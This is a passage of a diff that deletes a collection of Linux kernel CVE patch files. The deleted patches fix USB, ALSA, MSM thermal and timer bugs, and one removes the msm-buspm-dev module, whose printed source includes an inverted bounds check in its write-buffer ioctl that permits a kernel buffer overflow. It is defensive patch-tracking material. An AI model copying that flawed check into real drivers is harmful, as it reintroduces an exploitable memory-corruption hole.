-@@ -787,6 +787,12 @@ static int iowarrior_probe(struct usb_interface *interface,
- iface_desc = interface->cur_altsetting;
- dev->product_id = le16_to_cpu(udev->descriptor.idProduct);
-
-+ if (iface_desc->desc.bNumEndpoints < 1) {
-+ dev_err(&interface->dev, "Invalid number of endpoints\n");
-+ retval = -EINVAL;
-+ goto error;
-+ }
-+
- /* set up the endpoint information */
- for (i = 0; i < iface_desc->desc.bNumEndpoints; ++i) {
- endpoint = &iface_desc->endpoint[i].desc;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2188/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-2188/ANY/0002.patch
deleted file mode 100644
index 7e944dee..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2188/ANY/0002.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From b7321e81fc369abe353cf094d4f0dc2fe11ab95f Mon Sep 17 00:00:00 2001
-From: Johan Hovold
-Date: Tue, 7 Mar 2017 16:11:03 +0100
-Subject: USB: iowarrior: fix NULL-deref at probe
-
-Make sure to check for the required interrupt-in endpoint to avoid
-dereferencing a NULL-pointer should a malicious device lack such an
-endpoint.
-
-Note that a fairly recent change purported to fix this issue, but added
-an insufficient test on the number of endpoints only, a test which can
-now be removed.
-
-Fixes: 4ec0ef3a8212 ("USB: iowarrior: fix oops with malicious USB descriptors")
-Fixes: 946b960d13c1 ("USB: add driver for iowarrior devices.")
-Cc: stable # 2.6.21
-Signed-off-by: Johan Hovold
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/usb/misc/iowarrior.c | 13 +++++++------
- 1 file changed, 7 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/usb/misc/iowarrior.c b/drivers/usb/misc/iowarrior.c
-index 095778f..3ad058c 100644
---- a/drivers/usb/misc/iowarrior.c
-+++ b/drivers/usb/misc/iowarrior.c
-@@ -781,12 +781,6 @@ static int iowarrior_probe(struct usb_interface *interface,
- iface_desc = interface->cur_altsetting;
- dev->product_id = le16_to_cpu(udev->descriptor.idProduct);
-
-- if (iface_desc->desc.bNumEndpoints < 1) {
-- dev_err(&interface->dev, "Invalid number of endpoints\n");
-- retval = -EINVAL;
-- goto error;
-- }
--
- /* set up the endpoint information */
- for (i = 0; i < iface_desc->desc.bNumEndpoints; ++i) {
- endpoint = &iface_desc->endpoint[i].desc;
-@@ -797,6 +791,13 @@ static int iowarrior_probe(struct usb_interface *interface,
- /* this one will match for the IOWarrior56 only */
- dev->int_out_endpoint = endpoint;
- }
-+
-+ if (!dev->int_in_endpoint) {
-+ dev_err(&interface->dev, "no interrupt-in endpoint found\n");
-+ retval = -ENODEV;
-+ goto error;
-+ }
-+
- /* we have to check the report_size often, so remember it in the endianness suitable for our machine */
- dev->report_size = usb_endpoint_maxp(dev->int_in_endpoint);
- if
((dev->interface->cur_altsetting->desc.bInterfaceNumber == 0) &&
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2384/^4.5/0001.patch b/Patches/Linux_CVEs/CVE-2016-2384/^4.5/0001.patch
deleted file mode 100644
index 3a2f4799..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2384/^4.5/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 07d86ca93db7e5cdf4743564d98292042ec21af7 Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov
-Date: Sat, 13 Feb 2016 11:08:06 +0300
-Subject: ALSA: usb-audio: avoid freeing umidi object twice
-
-The 'umidi' object will be free'd on the error path by snd_usbmidi_free()
-when tearing down the rawmidi interface. So we shouldn't try to free it
-in snd_usbmidi_create() after having registered the rawmidi interface.
-
-Found by KASAN.
-
-Signed-off-by: Andrey Konovalov
-Acked-by: Clemens Ladisch
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/usb/midi.c | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/sound/usb/midi.c b/sound/usb/midi.c
-index cc39f63..007cf58 100644
---- a/sound/usb/midi.c
-+++ b/sound/usb/midi.c
-@@ -2455,7 +2455,6 @@ int snd_usbmidi_create(struct snd_card *card,
- else
- err = snd_usbmidi_create_endpoints(umidi, endpoints);
- if (err < 0) {
-- snd_usbmidi_free(umidi);
- return err;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2411/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2411/ANY/0001.patch
deleted file mode 100644
index 24611568..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2411/ANY/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 43e6938f37be0386fff4117e8aefff9be49bfe8a Mon Sep 17 00:00:00 2001
-From: Mahesh Sivasubramanian
-Date: Wed, 17 Feb 2016 14:36:32 -0700
-Subject: msm: thermal: Add range checking for cluster_id
-
-The cluster id flag is passed in from the userspace through ioctl
-interface. Ensure correctness of cluster id to avoid out of bounds array
-accesses.
-
-CRS-fixed: 977508
-Change-Id: I778b962d347b90488b983a15087b13e90ad06688
-Signed-off-by: Mahesh Sivasubramanian
----
- drivers/thermal/msm_thermal-dev.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/thermal/msm_thermal-dev.c b/drivers/thermal/msm_thermal-dev.c
-index e1032bc..e6af6b8 100644
---- a/drivers/thermal/msm_thermal-dev.c
-+++ b/drivers/thermal/msm_thermal-dev.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -114,6 +114,9 @@ static long msm_thermal_process_freq_table_req(struct msm_thermal_ioctl *query,
- uint32_t table_idx, idx = 0, cluster_id = query->clock_freq.cluster_num;
- struct clock_plan_arg *clock_freq = &(query->clock_freq);
-
-+ if (cluster_id >= num_possible_cpus())
-+ return -EINVAL;
-+
- if (!freq_table_len[cluster_id]) {
- ret = msm_thermal_get_freq_plan_size(cluster_id,
- &freq_table_len[cluster_id]);
-@@ -200,6 +203,9 @@ static long msm_thermal_process_voltage_table_req(
- uint32_t cluster_id = query->voltage.cluster_num;
- struct voltage_plan_arg *voltage = &(query->voltage);
-
-+ if (cluster_id >= num_possible_cpus())
-+ return -EINVAL;
-+
- if (!voltage_table_ptr[cluster_id]) {
- if (!freq_table_len[cluster_id]) {
- ret = msm_thermal_get_freq_plan_size(cluster_id,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2438/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2438/ANY/0001.patch
deleted file mode 100644
index b317ec29..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2438/ANY/0001.patch
+++ /dev/null
@@ -1,98 +0,0 @@
-From b5a663aa426f4884c71cd8580adae73f33570f0d Mon Sep 17 00:00:00 2001
-From: Takashi Iwai
-Date: Thu, 14 Jan 2016 16:30:58 +0100
-Subject: [PATCH] ALSA: timer: Harden slave timer list handling
-
-A slave timer instance might be still accessible in a racy way while
-operating the master instance as it lacks of locking. Since the
-master operation is mostly protected with timer->lock, we should cope
-with it while changing the slave instance, too. Also, some linked
-lists (active_list and ack_list) of slave instances aren't unlinked
-immediately at stopping or closing, and this may lead to unexpected
-accesses.
-
-This patch tries to address these issues. It adds spin lock of
-timer->lock (either from master or slave, which is equivalent) in a
-few places. For avoiding a deadlock, we ensure that the global
-slave_active_lock is always locked at first before each timer lock.
-
-Also, ack and active_list of slave instances are properly unlinked at
-snd_timer_stop() and snd_timer_close().
-
-Last but not least, remove the superfluous call of _snd_timer_stop()
-at removing slave links. This is a noop, and calling it may confuse
-readers wrt locking. Further cleanup will follow in a later patch.
-
-Actually we've got reports of use-after-free by syzkaller fuzzer, and
-this hopefully fixes these issues.
-
-Reported-by: Dmitry Vyukov
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/core/timer.c | 18 ++++++++++++++----
- 1 file changed, 14 insertions(+), 4 deletions(-)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 3810ee8f12051..4e8d7bfffff6b 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -215,11 +215,13 @@ static void snd_timer_check_master(struct snd_timer_instance *master)
- slave->slave_id == master->slave_id) {
- list_move_tail(&slave->open_list, &master->slave_list_head);
- spin_lock_irq(&slave_active_lock);
-+ spin_lock(&master->timer->lock);
- slave->master = master;
- slave->timer = master->timer;
- if (slave->flags & SNDRV_TIMER_IFLG_RUNNING)
- list_add_tail(&slave->active_list,
- &master->slave_active_head);
-+ spin_unlock(&master->timer->lock);
- spin_unlock_irq(&slave_active_lock);
- }
- }
-@@ -346,15 +348,18 @@ int snd_timer_close(struct snd_timer_instance *timeri)
- timer->hw.close)
- timer->hw.close(timer);
- /* remove slave links */
-+ spin_lock_irq(&slave_active_lock);
-+ spin_lock(&timer->lock);
- list_for_each_entry_safe(slave, tmp, &timeri->slave_list_head,
- open_list) {
-- spin_lock_irq(&slave_active_lock);
-- _snd_timer_stop(slave, 1, SNDRV_TIMER_EVENT_RESOLUTION);
- list_move_tail(&slave->open_list, &snd_timer_slave_list);
- slave->master = NULL;
- slave->timer = NULL;
-- spin_unlock_irq(&slave_active_lock);
-+ list_del_init(&slave->ack_list);
-+ list_del_init(&slave->active_list);
- }
-+ spin_unlock(&timer->lock);
-+ spin_unlock_irq(&slave_active_lock);
- mutex_unlock(®ister_mutex);
- }
- out:
-@@ -441,9 +446,12 @@ static int snd_timer_start_slave(struct snd_timer_instance *timeri)
-
- spin_lock_irqsave(&slave_active_lock, flags);
- timeri->flags |= SNDRV_TIMER_IFLG_RUNNING;
-- if (timeri->master)
-+ if (timeri->master && timeri->timer) {
-+ spin_lock(&timeri->timer->lock);
- list_add_tail(&timeri->active_list,
- &timeri->master->slave_active_head);
-+ spin_unlock(&timeri->timer->lock);
-+ }
-
spin_unlock_irqrestore(&slave_active_lock, flags);
- return 1; /* delayed start */
- }
-@@ -489,6 +497,8 @@ static int _snd_timer_stop(struct snd_timer_instance * timeri,
- if (!keep_flag) {
- spin_lock_irqsave(&slave_active_lock, flags);
- timeri->flags &= ~SNDRV_TIMER_IFLG_RUNNING;
-+ list_del_init(&timeri->ack_list);
-+ list_del_init(&timeri->active_list);
- spin_unlock_irqrestore(&slave_active_lock, flags);
- }
- goto __end;
diff --git a/Patches/Linux_CVEs/CVE-2016-2441/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2441/ANY/0001.patch
deleted file mode 100644
index ababce7e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2441/ANY/0001.patch
+++ /dev/null
@@ -1,605 +0,0 @@
-From 6fb29c4773f632b7b6c31a8de56f55c32de3d350 Mon Sep 17 00:00:00 2001
-From: Kiran Gunda
-Date: Mon, 29 Feb 2016 13:27:50 +0530
-Subject: msm: msm_bus: remove the buspm module from kernel
-
-Remove the buspm module from msm_bus since it adds
-no functionality to the bus bandwidth aggregation
-driver. It is a loadable module used for profiling
-purposes.
-
-Change-Id: Ia0d21eb7e48d3cb2a74d4fae5ee4fb2fd449ea9f
-Signed-off-by: Kiran Gunda
----
- arch/arm/configs/msm8909_defconfig | 1 -
- arch/arm/configs/msm8909w-perf_defconfig | 1 -
- arch/arm/configs/msm8909w_defconfig | 1 -
- arch/arm/configs/msm8937-perf_defconfig | 1 -
- arch/arm/configs/msm8937_defconfig | 1 -
- arch/arm/configs/msmcortex-perf_defconfig | 1 -
- arch/arm/configs/msmcortex_defconfig | 1 -
- arch/arm64/configs/msm-perf_defconfig | 1 -
- arch/arm64/configs/msm8937-perf_defconfig | 1 -
- arch/arm64/configs/msm8937_defconfig | 1 -
- arch/arm64/configs/msm_defconfig | 1 -
- arch/arm64/configs/msmcortex-perf_defconfig | 1 -
- arch/arm64/configs/msmcortex_defconfig | 1 -
- drivers/platform/msm/Kconfig | 9 -
- drivers/platform/msm/msm_bus/Makefile | 1 -
- drivers/platform/msm/msm_bus/msm-buspm-dev.c | 368 ---------------------
- .../msm/msm_bus/msm_buspm_coresight_adhoc.c | 1 +
- 17 files changed, 1 insertion(+), 391 deletions(-)
-
-diff --git a/arch/arm/configs/msm8909_defconfig b/arch/arm/configs/msm8909_defconfig
-index a8ab18c..e2621aa 100644
---- a/arch/arm/configs/msm8909_defconfig
-+++ b/arch/arm/configs/msm8909_defconfig
-@@ -383,7 +383,6 @@ CONFIG_ANDROID_LOW_MEMORY_KILLER=y
- CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_REVID=y
- CONFIG_SPS=y
-diff --git a/arch/arm/configs/msm8909w-perf_defconfig b/arch/arm/configs/msm8909w-perf_defconfig
-index e6a2585..435f97e 100644
---- a/arch/arm/configs/msm8909w-perf_defconfig
-+++ b/arch/arm/configs/msm8909w-perf_defconfig
-@@ -407,7 +407,6 @@
CONFIG_ANDROID_LOW_MEMORY_KILLER=y
- CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msm8909w_defconfig b/arch/arm/configs/msm8909w_defconfig
-index 7e4d0308d..2a8c354 100644
---- a/arch/arm/configs/msm8909w_defconfig
-+++ b/arch/arm/configs/msm8909w_defconfig
-@@ -409,7 +409,6 @@ CONFIG_ANDROID_LOW_MEMORY_KILLER=y
- CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msm8937-perf_defconfig b/arch/arm/configs/msm8937-perf_defconfig
-index fd0c4e9..48c10c8 100644
---- a/arch/arm/configs/msm8937-perf_defconfig
-+++ b/arch/arm/configs/msm8937-perf_defconfig
-@@ -471,7 +471,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msm8937_defconfig b/arch/arm/configs/msm8937_defconfig
-index 0c3e1d1..0d89f31 100644
---- a/arch/arm/configs/msm8937_defconfig
-+++ b/arch/arm/configs/msm8937_defconfig
-@@ -478,7 +478,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msmcortex-perf_defconfig b/arch/arm/configs/msmcortex-perf_defconfig
-index f41e11d..be65d54 100644
---- a/arch/arm/configs/msmcortex-perf_defconfig
-+++ b/arch/arm/configs/msmcortex-perf_defconfig
-@@ -474,7 +474,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msmcortex_defconfig b/arch/arm/configs/msmcortex_defconfig
-index
3306d6c..c58a80a 100644
---- a/arch/arm/configs/msmcortex_defconfig
-+++ b/arch/arm/configs/msmcortex_defconfig
-@@ -475,7 +475,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm-perf_defconfig b/arch/arm64/configs/msm-perf_defconfig
-index c2c0232..05efc6f 100644
---- a/arch/arm64/configs/msm-perf_defconfig
-+++ b/arch/arm64/configs/msm-perf_defconfig
-@@ -479,7 +479,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm8937-perf_defconfig b/arch/arm64/configs/msm8937-perf_defconfig
-index c697e1f..e10acc8 100644
---- a/arch/arm64/configs/msm8937-perf_defconfig
-+++ b/arch/arm64/configs/msm8937-perf_defconfig
-@@ -484,7 +484,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm8937_defconfig b/arch/arm64/configs/msm8937_defconfig
-index b05e721c..3342d55 100644
---- a/arch/arm64/configs/msm8937_defconfig
-+++ b/arch/arm64/configs/msm8937_defconfig
-@@ -488,7 +488,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig
-index 3d907ce..7054eb2 100644
---- a/arch/arm64/configs/msm_defconfig
-+++ b/arch/arm64/configs/msm_defconfig
-@@ -485,7 +485,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_DEBUG_BUS_VOTER=y
- CONFIG_QPNP_POWER_ON=y
-diff --git
a/arch/arm64/configs/msmcortex-perf_defconfig b/arch/arm64/configs/msmcortex-perf_defconfig
-index b3292ed..d0b9681 100644
---- a/arch/arm64/configs/msmcortex-perf_defconfig
-+++ b/arch/arm64/configs/msmcortex-perf_defconfig
-@@ -487,7 +487,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msmcortex_defconfig b/arch/arm64/configs/msmcortex_defconfig
-index a0176f1..8d449f9 100644
---- a/arch/arm64/configs/msmcortex_defconfig
-+++ b/arch/arm64/configs/msmcortex_defconfig
-@@ -491,7 +491,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/drivers/platform/msm/Kconfig b/drivers/platform/msm/Kconfig
-index d1fabe1..b0a9a54 100644
---- a/drivers/platform/msm/Kconfig
-+++ b/drivers/platform/msm/Kconfig
-@@ -16,15 +16,6 @@ config MSM_BUS_SCALING
- for the active devices needs without keeping the clocks at max
- frequency when a slower speed is sufficient.
-
--config MSM_BUSPM_DEV
-- tristate "MSM Bus Performance Monitor Kernel Module"
-- depends on MSM_BUS_SCALING
-- help
-- This kernel module is used to mmap() hardware registers for the
-- performance monitors, counters, etc.
The module can also be used to
-- allocate physical memory which is used by bus performance hardware to
-- dump performance data
--
- config BUS_TOPOLOGY_ADHOC
- bool "ad-hoc bus scaling topology"
- help
-diff --git a/drivers/platform/msm/msm_bus/Makefile b/drivers/platform/msm/msm_bus/Makefile
-index fec4537..a58994d 100644
---- a/drivers/platform/msm/msm_bus/Makefile
-+++ b/drivers/platform/msm/msm_bus/Makefile
-@@ -24,4 +24,3 @@ endif
-
-
- obj-$(CONFIG_DEBUG_FS) += msm_bus_dbg.o
--obj-$(CONFIG_MSM_BUSPM_DEV) += msm-buspm-dev.o
-diff --git a/drivers/platform/msm/msm_bus/msm-buspm-dev.c b/drivers/platform/msm/msm_bus/msm-buspm-dev.c
-index 4d9262b..e69de29 100644
---- a/drivers/platform/msm/msm_bus/msm-buspm-dev.c
-+++ b/drivers/platform/msm/msm_bus/msm-buspm-dev.c
-@@ -1,368 +0,0 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 and
-- * only version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--/* #define DEBUG */
--
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--
--#define MSM_BUSPM_DRV_NAME "msm-buspm-dev"
--
--#ifdef CONFIG_COMPAT
--static long
--msm_buspm_dev_compat_ioctl(struct file *filp, unsigned int cmd,
-- unsigned long arg);
--#else
--#define msm_buspm_dev_compat_ioctl NULL
--#endif
--
--static long
--msm_buspm_dev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg);
--static int msm_buspm_dev_mmap(struct file *filp, struct vm_area_struct *vma);
--static int msm_buspm_dev_release(struct inode *inode, struct file *filp);
--static int msm_buspm_dev_open(struct inode *inode, struct file *filp);
--
--static const struct file_operations msm_buspm_dev_fops = {
-- .owner = THIS_MODULE,
-- .mmap = msm_buspm_dev_mmap,
-- .open = msm_buspm_dev_open,
-- .unlocked_ioctl = msm_buspm_dev_ioctl,
-- .compat_ioctl = msm_buspm_dev_compat_ioctl,
-- .llseek = noop_llseek,
-- .release = msm_buspm_dev_release,
--};
--
--struct miscdevice msm_buspm_misc = {
-- .minor = MISC_DYNAMIC_MINOR,
-- .name = MSM_BUSPM_DRV_NAME,
-- .fops = &msm_buspm_dev_fops,
--};
--
--
--enum msm_buspm_spdm_res {
-- SPDM_RES_ID = 0,
-- SPDM_RES_TYPE = 0x63707362,
-- SPDM_KEY = 0x00006e65,
-- SPDM_SIZE = 4,
--};
--/*
-- * Allocate kernel buffer.
-- * Currently limited to one buffer per file descriptor. If alloc() is
-- * called twice for the same descriptor, the original buffer is freed.
-- * There is also no locking protection so the same descriptor can not be shared.
-- */
--
--static inline void *msm_buspm_dev_get_vaddr(struct file *filp)
--{
-- struct msm_buspm_map_dev *dev = filp->private_data;
--
-- return (dev) ? dev->vaddr : NULL;
--}
--
--static inline unsigned int msm_buspm_dev_get_buflen(struct file *filp)
--{
-- struct msm_buspm_map_dev *dev = filp->private_data;
--
-- return dev ?
dev->buflen : 0;
--}
--
--static inline unsigned long msm_buspm_dev_get_paddr(struct file *filp)
--{
-- struct msm_buspm_map_dev *dev = filp->private_data;
--
-- return (dev) ? dev->paddr : 0L;
--}
--
--static void msm_buspm_dev_free(struct file *filp)
--{
-- struct msm_buspm_map_dev *dev = filp->private_data;
--
-- if (dev && dev->vaddr) {
-- pr_debug("freeing memory at 0x%p\n", dev->vaddr);
-- dma_free_coherent(msm_buspm_misc.this_device, dev->buflen,
-- dev->vaddr, dev->paddr);
-- dev->paddr = 0L;
-- dev->vaddr = NULL;
-- }
--}
--
--static int msm_buspm_dev_open(struct inode *inode, struct file *filp)
--{
-- struct msm_buspm_map_dev *dev;
--
-- if (capable(CAP_SYS_ADMIN)) {
-- dev = kzalloc(sizeof(*dev), GFP_KERNEL);
-- if (dev)
-- filp->private_data = dev;
-- else
-- return -ENOMEM;
-- } else {
-- return -EPERM;
-- }
--
-- return 0;
--}
--
--static int
--msm_buspm_dev_alloc(struct file *filp, struct buspm_alloc_params data)
--{
-- dma_addr_t paddr;
-- void *vaddr;
-- struct msm_buspm_map_dev *dev = filp->private_data;
--
-- /* If buffer already allocated, then free it */
-- if (dev->vaddr)
-- msm_buspm_dev_free(filp);
--
-- /* Allocate uncached memory */
-- vaddr = dma_alloc_coherent(msm_buspm_misc.this_device, data.size,
-- &paddr, GFP_KERNEL);
--
-- if (vaddr == NULL) {
-- pr_err("allocation of 0x%zu bytes failed", data.size);
-- return -ENOMEM;
-- }
--
-- dev->vaddr = vaddr;
-- dev->paddr = paddr;
-- dev->buflen = data.size;
-- filp->f_pos = 0;
-- pr_debug("virt addr = 0x%p\n", dev->vaddr);
-- pr_debug("phys addr = 0x%lx\n", dev->paddr);
--
-- return 0;
--}
--
--static int msm_bus_rpm_req(u32 rsc_type, u32 key, u32 hwid,
-- int ctx, u32 val)
--{
-- struct msm_rpm_request *rpm_req;
-- int ret, msg_id;
--
-- rpm_req = msm_rpm_create_request(ctx, rsc_type, SPDM_RES_ID, 1);
-- if (rpm_req == NULL) {
-- pr_err("RPM: Couldn't create RPM Request\n");
-- return -ENXIO;
-- }
--
-- ret = msm_rpm_add_kvp_data(rpm_req, key, (const uint8_t *)&val,
--
(int)(sizeof(uint32_t)));
-- if (ret) {
-- pr_err("RPM: Add KVP failed for RPM Req:%u\n",
-- rsc_type);
-- goto err;
-- }
--
-- pr_debug("Added Key: %d, Val: %u, size: %zu\n", key,
-- (uint32_t)val, sizeof(uint32_t));
-- msg_id = msm_rpm_send_request(rpm_req);
-- if (!msg_id) {
-- pr_err("RPM: No message ID for req\n");
-- ret = -ENXIO;
-- goto err;
-- }
--
-- ret = msm_rpm_wait_for_ack(msg_id);
-- if (ret) {
-- pr_err("RPM: Ack failed\n");
-- goto err;
-- }
--
--err:
-- msm_rpm_free_request(rpm_req);
-- return ret;
--}
--
--static int msm_buspm_ioc_cmds(uint32_t arg)
--{
-- switch (arg) {
-- case MSM_BUSPM_SPDM_CLK_DIS:
-- case MSM_BUSPM_SPDM_CLK_EN:
-- return msm_bus_rpm_req(SPDM_RES_TYPE, SPDM_KEY, 0,
-- MSM_RPM_CTX_ACTIVE_SET, arg);
-- default:
-- pr_warn("Unsupported ioctl command: %d\n", arg);
-- return -EINVAL;
-- }
--}
--
--
--
--static long
--msm_buspm_dev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
--{
-- struct buspm_xfer_req xfer;
-- struct buspm_alloc_params alloc_data;
-- unsigned long paddr;
-- int retval = 0;
-- void *buf = msm_buspm_dev_get_vaddr(filp);
-- unsigned int buflen = msm_buspm_dev_get_buflen(filp);
-- unsigned char *dbgbuf = buf;
--
-- if (_IOC_TYPE(cmd) != MSM_BUSPM_IOC_MAGIC) {
-- pr_err("Wrong IOC_MAGIC.Exiting\n");
-- return -ENOTTY;
-- }
--
-- switch (cmd) {
-- case MSM_BUSPM_IOC_FREE:
-- pr_debug("cmd = 0x%x (FREE)\n", cmd);
-- msm_buspm_dev_free(filp);
-- break;
--
-- case MSM_BUSPM_IOC_ALLOC:
-- pr_debug("cmd = 0x%x (ALLOC)\n", cmd);
-- retval = __get_user(alloc_data.size, (uint32_t __user *)arg);
--
-- if (retval == 0)
-- retval = msm_buspm_dev_alloc(filp, alloc_data);
-- break;
--
-- case MSM_BUSPM_IOC_RD_PHYS_ADDR:
-- pr_debug("Read Physical Address\n");
-- paddr = msm_buspm_dev_get_paddr(filp);
-- if (paddr == 0L) {
-- retval = -EINVAL;
-- } else {
-- pr_debug("phys addr = 0x%lx\n", paddr);
-- retval = __put_user(paddr,
-- (unsigned long __user *)arg);
-- }
-- break;
--
-- case MSM_BUSPM_IOC_RDBUF:
-- if
(!buf) {
-- retval = -EINVAL;
-- break;
-- }
--
-- pr_debug("Read Buffer: 0x%x%x%x%x\n",
-- dbgbuf[0], dbgbuf[1], dbgbuf[2], dbgbuf[3]);
--
-- if (copy_from_user(&xfer, (void __user *)arg, sizeof(xfer))) {
-- retval = -EFAULT;
-- break;
-- }
--
-- if ((xfer.size <= buflen) &&
-- (copy_to_user((void __user *)xfer.data, buf,
-- xfer.size))) {
-- retval = -EFAULT;
-- break;
-- }
-- break;
--
-- case MSM_BUSPM_IOC_WRBUF:
-- pr_debug("Write Buffer\n");
--
-- if (!buf) {
-- retval = -EINVAL;
-- break;
-- }
--
-- if (copy_from_user(&xfer, (void __user *)arg, sizeof(xfer))) {
-- retval = -EFAULT;
-- break;
-- }
--
-- if ((buflen <= xfer.size) &&
-- (copy_from_user(buf, (void __user *)xfer.data,
-- xfer.size))) {
-- retval = -EFAULT;
-- break;
-- }
-- break;
--
-- case MSM_BUSPM_IOC_CMD:
-- pr_debug("IOCTL command: cmd: %d arg: %lu\n", cmd, arg);
-- retval = msm_buspm_ioc_cmds(arg);
-- break;
--
-- default:
-- pr_debug("Unknown command 0x%x\n", cmd);
-- retval = -EINVAL;
-- break;
-- }
--
-- return retval;
--}
--
